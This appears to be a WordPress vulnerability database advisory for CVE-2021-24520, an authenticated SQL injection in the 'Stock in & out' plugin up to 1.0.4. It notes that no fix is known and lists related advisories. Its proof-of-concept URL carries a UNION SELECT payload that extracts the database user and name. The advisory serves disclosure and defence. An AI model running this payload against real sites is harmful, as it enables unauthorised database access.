Stock in & out <= 1.0.4 – Authenticated SQL Injection | CVE 2021-24520 | Plugin Vulnerabilities

Description

The plugin lacks proper sanitization before passing variables to an SQL request, making it vulnerable to SQL Injection attacks. Users with a role of contributor or higher can exploit this vulnerability.

Proof of Concept

https://www.example.com/wp-admin/admin.php?page=stock_in&product_id=0+union+select+1%2C2%2C3%2Cuser%28%29%2Cdatabase%28%29%2C6%2C7%2C8%2C9%2C10&tab=history

Affects Plugins

No known fix

References

CVE

URL

https://github.com/pang0lin/CVEproject/blob/main/wordpress_Stock-in-and-out_sqli.md

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

pang0lin

Submitter

pang0lin

Submitter website

https://github.com/pang0lin

Verified

Yes

WPVDB ID

f903aadd-17af-4ddf-8635-abb3338ac815

Timeline

Publicly Published

2021-06-02 (about 4 years ago)

Added

2021-07-12 (about 4 years ago)

Last Updated

2021-08-10 (about 4 years ago)

Other

Published

Title

Published

2025-01-03

Title

SSL Wireless SMS Notification < 3.6.0 - Unauthenticated SQL Injection

Published

2024-07-29

Title

SmartSearch WP <= 2.4.4 - Unauthenticated SQLi

Published

2025-04-07

Title

Nearby Locations <= 1.1.1 - Authenticated (Administrator+) SQL Injection

Published

2022-08-29

Title

Zephyr Project Manager < 3.2.5 - Multiple Unauthenticated SQLi

Published

2024-09-20

Title

LatePoint < 5.0.12 - Unauthenticated Arbitrary User Password Change via SQL Injection